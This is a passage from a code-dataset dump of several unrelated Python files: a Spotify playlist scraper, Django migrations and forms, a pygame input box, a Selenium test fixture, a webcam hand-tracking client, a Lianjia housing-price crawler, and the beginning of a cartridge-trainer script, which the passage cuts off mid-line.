results[\"total\"]\n items = results['items']\n i = 1\n while results['next']:\n results = sp.next(results)\n items.extend(results['items'])\n print(\"Processed songs: \" + str(i*100) + \"/\" + str(total_songs))\n i += 1\n print(\"Finished!\")\n name_songs = []\n artists_songs = []\n uri_songs = []\n year_songs = []\n popularity_songs = []\n explicit_songs = []\n for i in items:\n if i != None:\n name_songs.append(i[\"track\"][\"name\"])\n artists_songs.append([i[\"track\"][\"artists\"][j][\"name\"] for j in range(len(i[\"track\"][\"artists\"]))])\n uri_songs.append(i[\"track\"][\"uri\"])\n year_songs.append(i[\"track\"][\"album\"][\"release_date\"][:4])\n popularity_songs.append(i[\"track\"][\"popularity\"])\n explicit_songs.append(i[\"track\"][\"explicit\"])\n return name_songs, artists_songs, uri_songs, year_songs, popularity_songs, explicit_songs\n\ndef get_audio_features_tracks(uri_songs_list, sp):\n keys = ['danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness',\n 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo',\n 'type', 'id', 'uri', 'track_href', 'analysis_url', 'duration_ms',\n 'time_signature']\n\n songs_audio_features = []\n\n i = 0\n\n for song_uri in uri_songs_list:\n songs_audio_features.append(sp.audio_features(song_uri)[0].values())\n if i % 100 == 0:\n print(\"Processed: \" + str(i) + \"/\" + str(len(uri_songs_list)))\n i += 1\n\n print(\"Processed: \" + str(i) + \"/\" + str(len(uri_songs_list)))\n\n df_audio_features = pd.DataFrame(songs_audio_features)\n\n df_audio_features.columns = keys\n\n df_audio_features.drop(df_audio_features.columns[[11, 12, 14, 15, 17]], axis=1, inplace=True)\n\n return df_audio_features\n\ndef main():\n path = \"../../\"\n f = open(path + \"spotify_credentials.txt\", \"r\")\n dict_credentials = json.loads(f.read()[:-1])\n\n sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(\n client_id=dict_credentials[\"client_id\"],\n client_secret=dict_credentials[\"client_secret\"]))\n\n input_url_playlist = input(\"URL of the playlist to append:\")\n\n if input_url_playlist[:34] != \"https://open.spotify.com/playlist/\":\n print(\"Wrong URL format!!!\")\n sys.exit()\n\n name_songs, artists_songs, uri_songs, year_songs, popularity_songs, explicit_songs = get_playlist_tracks(input_url_playlist, sp)\n\n song_dataframe_dict = {\"name\": name_songs, \"artist\": artists_songs,\n \"uri\": uri_songs, \"year\": year_songs,\n \"popularity\": popularity_songs, \"explicit\": explicit_songs}\n\n song_dataframe = pd.DataFrame(song_dataframe_dict)\n\n song_dataframe.to_csv(\"../data/songs.csv\", index=False)\n\n audio_features_dataframe = get_audio_features_tracks(uri_songs, sp)\n\n audio_features_dataframe.to_csv(\"../data/audio_features.csv\", index=False)\n\n df_new = song_dataframe.merge(audio_features_dataframe, how='left', on='uri')\n\n df_new[\"artist_1\"] = df_new[\"artist\"].apply(lambda x: str(x[0]))\n df_new[\"artist_2\"] = df_new[\"artist\"].apply(lambda x: str(x[1]) if len(x) > 1 else None)\n\n df_new = df_new[['name', 'artist_1', 'artist_2', 'uri', 'year', 'popularity', 'explicit', 'duration_ms', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo']]\n\n mypath = \"../data/\"\n files = [f for f in listdir(mypath) if isfile(join(mypath, f))]\n fileName = \"songs_all.csv\"\n\n if fileName in files:\n df_previous = pd.read_csv(\"../data/songs_all.csv\")\n print(\"Previous database len:\", len(df_previous))\n df_all = pd.concat([df_previous,df_new]).drop_duplicates().reset_index(drop=True)\n print(\"New database len:\", len(df_all))\n df_all.to_csv(\"../data/songs_all.csv\", index=False)\n else:\n df_new.to_csv(\"../data/songs_all.csv\", index=False)\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "code/song_database_generator.py", "file_name": "song_database_generator.py", "file_ext": "py", "file_size_in_byte": 4310, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "spotipy.Spotify", "line_number": 67, "usage_type": "call"}, {"api_name": "spotipy.oauth2.SpotifyClientCredentials", "line_number": 67, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "365293680", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dpclab', '0004_workout_tsb_d'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PMCPoint',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('date', models.DateTimeField()),\n ('atl_d', models.FloatField(null=True)),\n ('ctl_d', models.FloatField(null=True)),\n ('tsb_d', models.FloatField(null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='workout',\n name='atl_d',\n ),\n migrations.RemoveField(\n model_name='workout',\n name='ctl_d',\n ),\n migrations.RemoveField(\n model_name='workout',\n name='tsb_d',\n ),\n migrations.AddField(\n model_name='athlete',\n name='pmc_seed',\n field=models.DateTimeField(default=datetime.datetime(2014, 9, 30, 20, 14, 59, 218788)),\n preserve_default=True,\n ),\n ]\n", "sub_path": "dpclab/migrations/0005_auto_20140930_2014.py", "file_name": "0005_auto_20140930_2014.py", "file_ext": "py", "file_size_in_byte": 1284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.CreateModel", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.AutoField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.FloatField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 28, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 32, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 32, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "560676919", "text": "# Vamos a extender el formulario para incluir el email obligatorio al registrarse \nfrom django import forms \nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\nclass UserCreationFormWithEmail(UserCreationForm):\n\n email = forms.EmailField(required = True, help_text = \"Requerido, 254 caracteres como máximo y debe ser válido\")\n # Redefinimos la clase Meta\n class Meta: \n model = User\n fields = ['username', 'email','password1','password2']\n\n # Se añade una validación para evitar que 2 usuarios tengan el mismo email\n def clean_email(self):\n # Recuperamos el email escrito por pantalla\n email = self.cleaned_data.get(\"email\")\n # Filtramos en la BD si algún usuario tiene este email\n if User.objects.filter(email = email).exists():\n # Lanzamos un error si existe\n raise forms.ValidationError(\"El email ya esta registrado, pruebe con otra dirección de correo electrónico\")\n # si no existe , devuelve el email\n return email \n\n#Clase para el formulario del perfil \nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['avatar', 'bio', 'link']\n widgets = {\n 'avatar': forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n 'bio': forms.Textarea(attrs={'class':'form-control mt-3', 'rows':3, 'placeholder':'Biografía'}),\n 'link': forms.URLInput(attrs={'class':'form-control mt-3', 'placeholder':'Enlace'}),\n }\n\n# Clase para editar el email\nclass EmailForm(forms.ModelForm):\n email = forms.EmailField(required = True, help_text = \"Requerido, 254 caracteres como máximo y debe ser válido\")\n class Meta: \n model = User\n fields = ['email']\n\n # Validación para ver si el email se ha modificado \n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n # change data es una lista que contiene lo q se ha modificado\n if 'email' in self.changed_data:\n if User.objects.filter(email = email).exists():\n # Lanzamos un error si existe\n raise forms.ValidationError(\"El email ya esta registrado, pruebe con otra dirección de correo electrónico\")\n # si no existe , devuelve el email\n return email ", "sub_path": "registration/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 2368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.contrib.auth.forms.UserCreationForm", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 22, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Profile", "line_number": 29, "usage_type": "name"}, {"api_name": "django.forms.ClearableFileInput", "line_number": 32, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 32, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 33, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 33, "usage_type": "name"}, {"api_name": "django.forms.URLInput", "line_number": 34, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 34, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 38, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User", "line_number": 41, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.filter", "line_number": 49, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 49, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 51, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 51, "usage_type": "name"}]} +{"seq_id": "98486351", "text": "import pygame, string\nfrom pygame.locals import *\nimport config\n\n\ndef get_key():\n while 1:\n event = pygame.event.poll()\n if event.type == KEYDOWN:\n return event.key\n else:\n pass\n\n\ndef display_box_(screen, message, size,position):\n fontobject = pygame.font.Font(None, 30)\n pygame.draw.rect(screen, (0, 0, 0),\n (position[0] - size[0]/2-5,\n position[1] - size[1]/2-5,\n size[0]+10,size[1]+10), 0)\n pygame.draw.rect(screen, config.CYAN,\n [position[0] - size[0] / 2,\n position[1] - size[1] / 2,\n size[0], size[1]], )\n if len(message) != 0:\n screen.blit(fontobject.render(message, 1, (0,0,0)),\n (position[0]-7, position[1]-8))\n pygame.display.update()\n\n\ndef display_box(screen, message, size):\n fontobject = pygame.font.Font(None, 30)\n pygame.draw.rect(screen, (0, 0, 0),\n ((screen.get_width() / 2) - 100,\n (screen.get_height() / 2) - 10,\n 200, 20), 0)\n pygame.draw.rect(screen, config.CYAN,\n [(screen.get_width() / 2) - size[0] / 2,\n (screen.get_height() / 2) - size[1] / 2,\n size[0], size[1]], )\n if len(message) != 0:\n screen.blit(fontobject.render(message, 1, (0,0,0)),\n ((screen.get_width() / 2) - size[0] / 2 + 20, (screen.get_height() / 2) - size[1] / 2 + 10))\n pygame.display.update()\n\n\ndef ask(screen, question, size):\n pygame.font.init()\n current_string = []\n display_box(screen, question + \" : \" + string.join(current_string, \"\"), size)\n while 1:\n inkey = get_key()\n if inkey == K_BACKSPACE:\n current_string = current_string[0:-1]\n elif inkey == K_ESCAPE:\n return None\n elif inkey == K_RETURN:\n break\n elif inkey == K_MINUS:\n current_string.append(\"_\")\n elif inkey <= 127:\n current_string.append(chr(inkey))\n display_box(screen, question + \" : \" + string.join(current_string, \"\"), size)\n return string.join(current_string, \"\")\n\n#pygame.font.init()\n#screen = pygame.display.set_mode(config.screen_size)\n#while True:\n# display_box_(screen,str(5),[40,40],[100,100])\n", "sub_path": "MyGame/input_box.py", "file_name": "input_box.py", "file_ext": "py", "file_size_in_byte": 2365, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygame.event.poll", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.CYAN", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 37, "usage_type": "attribute"}, {"api_name": "config.CYAN", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.font.init", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 48, "usage_type": "attribute"}, {"api_name": "string.join", "line_number": 50, "usage_type": "call"}, {"api_name": "string.join", "line_number": 63, "usage_type": "call"}, {"api_name": "string.join", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "649391169", "text": "# A program that uses a fixture with the autouse parameter\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\n\nlink = \"http://selenium1py.pythonanywhere.com/\"\n\n\n@pytest.fixture\ndef driver():\n print(\"\\nstart driver for test..\")\n options = Options()\n options.add_argument(\"--no-sandbox\")\n service = Service(\"/chromedriver/stable/chromedriver\")\n driver = webdriver.Chrome(options=options, service=service)\n yield driver\n print(\"\\nquit driver..\")\n driver.quit()\n\n@pytest.fixture(autouse=True)\ndef prepare_data():\n print()\n print(\"preparing some critical data for every test\")\n\n\nclass TestMainPage1():\n def test_guest_should_see_login_link(self, driver):\n # не передаём как параметр фикстуру prepare_data, но она все равно выполняется\n driver.get(link)\n driver.find_element(By.CSS_SELECTOR, \"#login_link\")\n\n def test_guest_should_see_basket_link_on_the_main_page(self, driver):\n driver.get(link)\n driver.find_element(By.CSS_SELECTOR, \".basket-mini .btn-group > a\")\n\n\n ", "sub_path": "selenium_course/l34-6.py", "file_name": "l34-6.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytest.fixture", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 32, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 36, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "310470401", "text": "import cv2\r\nimport io\r\nimport socket\r\nimport struct\r\nimport time\r\nimport pickle\r\nimport zlib\r\nimport FDM\r\nimport HTM\r\nimport math\r\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient_socket.connect(('192.168.1.6', 2501))\r\nconnection = client_socket.makefile('wb')\r\n\r\ncam = cv2.VideoCapture(0)\r\n\r\ncam.set(3, 2048);\r\ncam.set(4, 2048);\r\n\r\nimg_counter = 0\r\npt=0\r\nencode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 90]\r\nDET=HTM.HD(Detect_confi=0.7)\r\nDE=FDM.FD(min_detection_confidence=0.7)\r\nwhile True:\r\n ret, img = cam.read()\r\n img=DET.findHands(img)\r\n lmlist=DET.findpos(img,draw=True)\r\n img=DE.findFace(img)\r\n flmlist=DE.lm(img,draw=True)\r\n if flmlist==0:\r\n print(\"No Face Detected\")\r\n if len(lmlist)!=0:\r\n \r\n #4-thumb 8- index\r\n x1,y1=lmlist[4][1],lmlist[4][2]\r\n x2,y2=lmlist[8][1],lmlist[8][2]\r\n cx,cy=(x1+x2)//2,(y1+y2)//2\r\n cv2.circle(img,(x1,y1),5,(0,255,255),cv2.FILLED)\r\n cv2.circle(img,(x2,y2),5,(0,255,255),cv2.FILLED)\r\n cv2.line(img,(x1,y1),(x2,y2),(0,0,255),2)\r\n cv2.circle(img,(cx,cy),5,(255,0,255),cv2.FILLED)\r\n cv2.circle(img,(cx,cy),5,(0,255,255),cv2.FILLED) \r\n ct=time.time()\r\n fps=1/(ct-pt)\r\n pt=ct\r\n cv2.putText(img,str(int(fps)),(10,70),cv2.FONT_HERSHEY_COMPLEX,3,(255,255,0),3)\r\n result, frame = cv2.imencode('.jpg', img, encode_param)\r\n data = pickle.dumps(frame, 0)\r\n size = len(data)\r\n\r\n\r\n print(\"{}: {}\".format(img_counter, size))\r\n client_socket.sendall(struct.pack(\">L\", size) + data)\r\n img_counter += 1\r\n\r\ncam.release()", "sub_path": "client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 1591, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "socket.socket", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 11, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 11, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 22, "usage_type": "attribute"}, {"api_name": "HTM.HD", "line_number": 23, "usage_type": "call"}, {"api_name": "FDM.FD", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 40, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 47, "usage_type": "attribute"}, {"api_name": "cv2.imencode", "line_number": 48, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "struct.pack", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "10572668", "text": "# -*- coding=utf-8 -*-\n'''\nAuthor: TianRan\nDate: 7/22/16\nVersion:\n07/22:\n 1: only consider the Beijing housing at this time\n 2: consider different area in Beijing, like HaiDian, ChaoYang, etc\n\n07/23:\n 1: add the configurations for area and web mapping for different cities in china,\n\n08/03:\n 1: add the log\n08/09:\n 1: modify the url for Suzhou and Shanghai for special after debuging\n 2: save the result to the json file\n09/11:\n add the project root dir to the enviroment, this is useful when\n we deploy the project in server.\n'''\nfrom __init__ import *\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom collections import defaultdict\nimport logging\nimport json\n\n# functions from util package\nfrom utils.path_util import *\nfrom utils.log_util import log_format\n\n# Beijing area map for different url in lianjia website\nfrom lianjia_confg import LIANJIA_MAP\n\n# set the format for the log\nlog_format(PROJECT_DIR + '/logs/crawler')\n\n\nclass LianJiaCrawler(object):\n '''\n crawling the housing price for different areas in china\n '''\n\n def __init__(self, url, area_map):\n '''\n\n :param url: the root website: 'http://bj.fang.lianjia.com'\n\n :field\n _url_dict: url for different area, key is area in Beijing(str),\n value is list of url in this area\n _html_dict: html for different area, key is area in Beijing(str),\n value is list of url in this area\n _price_dict: average price for different area, key is area in Beijing(str),\n value is list of url in this area\n\n '''\n if url[7:9] == 'sh' or url[7:9] == 'su': # special url for Shanghai and Suzhou\n self._url = url + '/list'\n else:\n self._url = url + '/loupan' # the price information is with this suffix\n self._url_dict = defaultdict(list)\n self._html_dict = defaultdict(list)\n self._price_dict = {}\n\n self._area_map = area_map\n\n self.logger = logging.getLogger(type(self).__name__)\n\n def _generate_url_dict(self):\n '''\n generate urls for different area, store them into the _url_dict,\n parse all\n :return:\n '''\n for area, url_name in self._area_map.items():\n try:\n url_root_area = self._url + '/' + url_name # root url for this area\n response = requests.get(url_root_area)\n except Exception as e:\n self.logger.exception(e)\n\n if response.status_code != 200:\n # log the info\n pass\n else:\n soup = BeautifulSoup(response.text, 'lxml')\n # get the number of pages for this area\n\n # print soup.find('div',class_='page-box house-lst-page-box')\n page_block = soup.find('div', class_='page-box house-lst-page-box')\n if page_block is None:\n continue\n else:\n dict_tmp = eval(page_block.get('page-data', ''))\n page_num = dict_tmp.get('totalPage', 0)\n\n # append the url\n for page_index in range(1, page_num + 1):\n self._url_dict[area].append(url_root_area + '/pg{}'.format(page_index))\n\n def _get_html_dict(self):\n '''\n parse the url in url_dict and store them in html_dict.\n :return:\n\n :notice:\n call _generate_url_dict() first before this function\n '''\n for area, url_list in self._url_dict.items():\n if len(url_list) == 0:\n raise ValueError('please generate url dict first')\n for url in url_list:\n try:\n response = requests.get(url)\n except Exception as e:\n # log\n # print traceback.print_exc()\n self.logger.exception(e)\n if response.status_code == 200:\n self._html_dict[area].append(response.text)\n else:\n # log\n pass\n\n def get_price_dict(self):\n '''\n generate the average prices for different areas\n :return:\n\n :notice:\n 1: call _generate_url_dict() and _get_html_dict() first\n 2: I only consider the average price here, thus the price calculated is based on\n average, eg, 20000 RMB/m^2\n '''\n # generate the url and html first\n self._generate_url_dict()\n self._get_html_dict()\n\n for area, html_list in self._html_dict.items():\n total_price = 0\n succ_count = 0\n\n # get the price in the html,\n for html in html_list:\n count_tmp, price_tmp = self._cal_average_price_from_html(html)\n succ_count += count_tmp\n total_price += price_tmp\n\n if succ_count == 0:\n # log\n pass\n else:\n average_price = round(total_price * 1.0 / succ_count, 0)\n self._price_dict[area] = average_price\n\n def _cal_average_price_from_html(self, html):\n '''\n parse the html and return the count and price for this html\n :param html:\n :return:\n succ_count: the succ count for the price for this html\n total_price: total price for the counts for this html\n '''\n soup = BeautifulSoup(html, 'lxml')\n\n div_list = soup.find_all('div', class_='col-2')\n succ_count = 0\n total_price = 0\n for index in range(len(div_list)):\n # print div_list[index].text.replace('\\n','')\n each_line = div_list[index].text.replace('\\n', '')\n each_line_no_space = re.sub('\\s*', '', each_line)\n # print each_line_no_space\n # print each_line_no_space[:3]\n\n # print each_line_no_space[:2]\n # print each_line_no_space[:2] == u'场均'\n if each_line_no_space[:2] == u'均价':\n try:\n # extract the price for every line and add them to the total price\n price = re.findall('\\d+', each_line_no_space)\n if len(price) is not 0:\n total_price += float(price[0])\n succ_count += 1\n except Exception as e:\n self.logger.exception(e)\n return succ_count, total_price\n\n\nif __name__ == '__main__':\n # lianjia_root_site = 'http://bj.fang.lianjia.com'\n # lianjia = LianJiaCrawler(lianjia_root_site)\n\n\n # debug code\n # print lianjia._url_dict\n # print lianjia._html_dict\n # print lianjia._html_dict[u'HuaiRou'][0]\n # lianjia._cal_average_price_from_html(lianjia._html_dict[u'HuaiRou'][0])\n # print lianjia._price_dict\n\n from datetime import date\n from utils.file_utils import ensure_dir\n ensure_dir(PROJECT_DIR + '/data/json/crawler/housing')\n json_out_path = PROJECT_DIR + '/data/json/crawler/housing/{0}_lianjia_housing.json'.format(str(date.today()))\n\n json_dict = {}\n for city, confg in LIANJIA_MAP.items():\n lianjia = LianJiaCrawler(confg['website'], confg['area_map'])\n lianjia.get_price_dict()\n # print lianjia._price_dict\n json_dict[city] = lianjia._price_dict\n\n\n # save the price to the json file\n with open(json_out_path, 'w') as f:\n json.dump(json_dict,f)\n\n\n\n\n", "sub_path": "web_crawler/china_housing_price/LianJia_Crawler.py", "file_name": "LianJia_Crawler.py", "file_ext": "py", "file_size_in_byte": 7511, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.log_util.log_format", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 65, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 66, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 71, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 90, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 118, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 168, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 176, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.file_utils.ensure_dir", "line_number": 208, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 209, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 209, "usage_type": "name"}, {"api_name": "lianjia_confg.LIANJIA_MAP.items", "line_number": 212, "usage_type": "call"}, {"api_name": "lianjia_confg.LIANJIA_MAP", "line_number": 212, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "634167142", "text": "import os\nimport keyboard\nfrom datetime import datetime\n\n\nprint(\"========================================================= \\n\",\n \"Red Meters Cartridge Trainer ~ Mass 4.0\\n\",\n \"This application WILL SHUT DOWN the device back end while running. Please allow it to completely finish.\\n \",\n \"If you do not get the 'All done!' message at the end, the back end most likely WAS NOT RESTARTED. \\n\",\n \" In this case, reboot the Red Meter to get the back end working again or DATA WILL NOT BE STORED.\\n\",\n \"========================================================= \\n\"\n )\n\ncartName = input(\"ENTER: Cartridge name: \")\n\n\n\n# REWRITE :\n#\ndir = \"/var/lib/rosenimbus/csv/\" + cartName\nif os.path.isfile(dir):\n print(\"A cartridge with this name/serial has already been tested. Re-using cartridge specifications.\")\n\n# else: ????\n# ./cartridge.sh $cname\nelse:\n exec(open('cartridge.py').read())\n\n\ntimestamp = datetime.now()\ntestDir = str(dir + \"/mass_\" + timestamp)\ndiameter = os.system(\"jq .inner_diameter_in $dir/cartridge.json\")\nballsRolled = 0\nballs = [67, 1046, 130, 8164, 3, 1807, 28, 226, 4273, 8, 93, 536]\nnumOfBalls = len(balls)\n\n\n#REFACTOR\nprint(\"Making new test directory...\")\nos.system(\"sudo mkdir \" + testDir)\n\nos.system(\"systemctl stop rosenimbus-backend.service\")\n\n\n# How are we to evaluate mass?\n# NEED: Testing code cleaned up and insight, please advise\n# Lines with mass in for loop need revision and elaboration\n\nfor numOfBalls in balls:\n ballDiameter = 1\n ballsRolled = ballsRolled + 1\n\n if ballDiameter >= 